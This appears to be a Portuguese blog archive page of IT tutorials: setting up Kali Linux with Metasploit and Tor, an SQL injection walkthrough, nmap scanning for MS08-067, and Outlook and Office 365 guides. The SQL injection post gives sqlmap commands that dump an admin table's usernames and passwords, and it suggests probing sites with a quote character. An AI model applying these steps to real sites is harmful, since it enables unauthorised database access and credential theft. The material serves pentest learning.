Anúncios

Arquivo

Posts Tagged ‘tutorial’

Tutorial: Instalando e fazendo as configurações iniciais do Kali Linux no Virtual Box


NOVOS TUTORIAIS AGORA EM http://www.infrasecurity.com.br/blog/?tag=kali-linux

 

Olá a todos

Gostaria de mostrar pra vocês como instalar e configurar o Kali Linux no Virtual Box bem como fazer as configurações iniciais que na minha opinião são indispensáveis.

O Kali Linux é uma evolução do Backtrack e pode ser baixado aqui http://www.kali.org, ele é mantido pela mesma empresa de segurança do Backtrack.

Algumas vantagens que vi no Kali é que ele é baseado em Debian e muitas ferramentas que davam algum problema no Backtrack, aqui até o momento funcionam sem problemas.

Vou mostrar como criar a máquina virtual, instalar o Kali, instalar o VBOX additions, TOR e também o EtherAPE que tinha no backtrack e não por padrão no Kali. Vamos lá?

1 – Criar a máquina virtual:

Vamos criar uma nova e atribuir um nome

ScreenHunter_07 Apr. 03 16.09

Aqui vamos atribuir a quantidade de memória RAM, no caso coloquei 1GB

ScreenHunter_08 Apr. 03 16.09

Vá avançando nas opções padrão até chegar no tamanho do disco, no caso, coloquei 50GB

ScreenHunter_11 Apr. 03 16.10

Antes de inicializar a máquina vá em configurações da VM e mude a placa de rede para Bridged Adapter, isso para que a VM possa acesar o próprio hardware da máquina física.

ScreenHunter_11 Apr. 03 16.11

Nesta opção selecione o CD-ROM e escolha o arquivo ISO do Kali Linux que foi baixado do site

ScreenHunter_12 Apr. 03 16.11

2 – Instalar o Kali Linux

Tudo feito corretamente, bastar iniciar a VM e a tela inicial será essa onde podemos escolher a opção “Graphical Install”

ScreenHunter_12 Apr. 03 16.12

Nesta tela e nas seguintes será possível configurar o idioma, teclado e fuso horário, faça as configurações conforme achar melhorScreenHunter_13 Apr. 03 16.12

Aqui podemos definir um hostname que desejarmos, e na próxima tela, pode ser colocado um sufixo, caso vc tenha um, ou pode deixar em branco mesmo

ScreenHunter_14 Apr. 03 16.14

Defina a senha do usuário Root

ScreenHunter_15 Apr. 03 16.15

Avançando até essa tela podemos usar a primeira opção para o particionamento do disco, a próxima tela é só avançar

ScreenHunter_16 Apr. 03 16.16

Nessa tela, podemos selecionar a primeira opção e avançar

ScreenHunter_18 Apr. 03 16.16

Podemos avançar, e na próxima tela selecionar “YES”

ScreenHunter_18 Apr. 03 16.17

Aguarde a instalação, e nessa, parte se você sua rede já configurada para fornecer um IP e com acesso a internet, vc pode selecionar a opção “Yes”.

ScreenHunter_19 Apr. 03 16.36

Caso tenha um proxy você pode configurar aqui ou simplesmente deixar em branco e avançar

ScreenHunter_20 Apr. 03 16.36

Selecione “Yes” e aguarde a conclusão da Instalação, Ao reiniciar é logar com usuário Root e a senha que vc configurou.

ScreenHunter_20 Apr. 03 16.44

3 – Configurações iniciais.

O primeiro passo é instalar o VBOX  Additions para isso faça o seguinte abra um terminal e digite:

apt-get update && apt-get install -y linux-headers-$(uname -r)

Aguarde a conclusão da instalação

Feito isso vá no Menu “Devices” do Virtual Box e clique em “Install Guest Additions”

ScreenHunter_20 Apr. 03 16.57

Quando for exibido essa tela, clique em cancelar

ScreenHunter_20 Apr. 03 17.00

Execute agora os seguintes comandos no terminal.

cp /media/cdrom0/VBoxLinuxAdditions.run /root/

chmod 755 /root/VBoxLinuxAdditions.run

./VBoxLinuxAdditions.run

Aguarde a conclusão da instalação e reinicie a VM

Após reiniciar, outra coisa que podemos configurar é o metasploit framework para isso faça o seguinte, abra um terminal e digite:

service postgresql start && service metasploit start

aguarde a conclusão e depois digite:

update-rc.d postgresql enable && update-rc.d metasploit enable

Para iniciar basta acessar conforme a imagem

metasploit-kali-metasploit-framework

Outra configuração inicial interessante de se fazer é a configuração do TOR para navegação anônima para isso vamos fazer o seguinte:

apt-get install tor tor-geoipdb polipo vidalia

Feito isso digite

mkdir /var/run/tor

chmod 700 /var/run/tor/

Vamos configurar o polipo para acessar através do tor para isso digite

vim /etc/polipo/config

Descomente as linhas

allowedClientes 127.0.0.1

socksParentProxy = “localhost:9050”

socksParentType = socks5

salve e saia do arquivo e digite

service tor restart

service polipo restart

Daí para navegar anônimo basta configurar no navegador o proxy http para 127.0.0.1 porta 8123 ou proxy socs5 para 127.0.0.1 porta 9050

Também pode ser usado para configurar em outras aplicações que suportem acesso via proxy

Para instalar o EtherApe basta digitar

apt-get install etherape

Aguarde a conclusão e ele vai estar disponível em Applications/Internet.

Espero que tenham gostado dessa dica e por gentileza não deixem de compartilhar

Até a próxima

Anúncios

Tutorial: SQL Injection para quem está iniciando


Olá a todos mais uma vez

Segue agora uma dica excelente para Pentest, esse breve tutorial vai mostrar uns passos básicos para explorar a vulnerabilidade de SQL Injection em alguns sites.

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.

Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP

cd /pentest/database/sqlmap

Vamos executar o sqlmap

OBS: Os parametros dbs, dump, tables, columns devem ser precedidos de — (dois traços)

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 dbs (vc precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘  no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável)

O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD tables

Devemos trocar NOMEDOBD pelo valor obtido em “current database”

O Resultado vai ser algo parecido com isso:

Screenshot-4

Daí podemos escolher uma tabela e listar as colunas

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin columns

O resultado será parecido a esse:

Screenshot-6

Podemos escolher quais colunas queremos extrair informações

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin -C id,passwrd,u_name dump

Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

Espero que tenham gostado

Por favor compartilhem

Tutorial: Como fazer backup e restore da lista de Autocompletar do Outlook 2010


Como exportar o cache de AutoCompletar

Para exportar o cache de AutoCompletar, siga estas etapas:

  1. Saia do Outlook e, em seguida, feche o Outlook Web Access ou o Outlook Web App (OWA) em todas as estações de trabalho que estão conectados à caixa de correio do usuário.
  2. Use MFCMAPI para importar a lista AutoCompletar. Para fazer isso, siga estes passos:
    1. Baixe o MFCMAPI de http://mfcmapi.codeplex.com.
    2. Execute mfcmapi.exe.
    3. No menu de session , clique em Logon.
    4. Se você for solicitado para um perfil, selecione o nome do perfil desejado e, em seguida, clique em OK.
    5. No painel superior, localize a linha que corresponde à sua caixa de correio e, em seguida, clique duas vezes nele.
    6. No painel de navegação do lado esquerdo, expanda Root Container e Início do armazenamento de informações ou IPM Sub Tree.
    7. Com o botão direito na pasta caixa de entrada e, em seguida, clique em Open Associated Content Table.Essa ação abre uma nova janela MFCMAPI que contém várias propriedades.
    8. Na coluna Subject , com o botão direito no item que tem o assunto IPM.Configuration.Autocomplete e clique em Exportar. Essa ação abre a janela Salvar em arquivo de mensagem .
    9. Na lista drop-down, selecione o arquivo MSG (UNICODE)e, em seguida, clique em OK.
    10. Selecione um local de pasta para o qual você deseja salvar a mensagem e, em seguida, clique em Salvar. Anote este local.

Como importar o cache de AutoCompletar

Para importar o cache de AutoCompletar exportado usando as etapas na seção “Como exportar o cache de AutoCompletar”, siga estas etapas:

  1. Saia do Outlook e, em seguida, feche o Outlook Web Access ou o Outlook Web App (OWA) em todas as estações de trabalho que estão conectados à caixa de correio do usuário.
  2. Use MFCMAPI para importar a lista AutoCompletar. Para fazer isso, siga estes passos:
    1. Execute mfcmapi.exe.
    2. No menu de session , clique em Logon.
    3. Se você for solicitado para um perfil, selecione o nome do perfil desejado e, em seguida, clique em OK.
    4. No painel superior, localize a linha que corresponde à sua caixa de correio e, em seguida, clique duas vezes nele.
    5. No painel de navegação do lado esquerdo, expanda Root Container e Início do armazenamento de informações ou IPM Sub Tree.
    6. Com o botão direito na pasta caixa de entrada e, em seguida, clique em Open Associated Content Table.Essa ação abre uma nova janela MFCMAPI que contém várias propriedades.
    7. Para evitar entradas duplicadas, você deve excluir a mensagem de conclusão automática existente.

      Observação Antes de excluir o IPM.Configuration.Autocomplete mensagem, você deve exportar a mensagem usando as etapas na seção “Como exportar o cache de AutoCompletar”.

      Para excluir a mensagem de preenchimento automático existente, siga estas etapas:

      1. Na coluna Subject , localize o item que tem o assunto IPM.Configuration.Autocomplete.
      2. Clique com o botão direito e, em seguida, clique em Excluir a mensagem. Isso abre a janela Excluir Item.
      3. Na lista drop-down, selecione a exclusão permanente (exclui excluído a retenção de item, se houver suporte) e, em seguida, clique em OK .
    8. No menu de Folder , clique em Import e, em seguida, clique em De MSG.
    9. Localize o arquivo. msg que você criou anteriormente na seção “Como para exportar a lista de preenchimento automático” e, em seguida, clique em OK.
    10. Na janela Mensagem de carga que aparece, selecione carregar a mensagem na pasta atual na lista estilo da carga e, em seguida, clique em OK.

Fonte: support.microsoft.com

Tutorial: Usando o nmap para verificação de vulnerabilidades


Olá a todos mais uma vez

Desta vez gostaria de mostrar pra vocês como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:

nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)

"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"

A resposta será algo parecido com isso informando se o alvo é vulnerável ou não

Host script results:
| smb-check-vulns:  
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui

http://hernaneac.net/2012/11/28/explorando-vulnerabilidades-usando-metasploit-framework/ 


								

Tutorial: Sincronização manual do diretório local para o office 365


Olá a todos

Gostaria de mostrar nesse breve tutorial a maneira que considero a mais fácil de fazer uma sincronização manual do diretório local com o office 365.

No servidor que tem a ferramenta de sincronização instalada e configurada, crie dois atalhos na área de trabalho,

um apontado para C:\Program Files\Microsoft Online Directory Sync\DirSyncConfigShell.psc1 e outro para C:\Program Files\Microsoft Online Directory Sync\SYNCBUS\Synchronization Service\UiShell\miisclient.exe

Abra o primeiro atalho e execute o comando Start-OnlineCoexistenceSync

Daí basta abrir o segundo e verificar se a atualização foi feita com sucesso conforme abaixo:

ScreenHunter_06 Mar. 11 14.33

 

Espero ter ajudado

Não se esqueça de ajudar compartilhando.

Até a próxima

%d blogueiros gostam disto: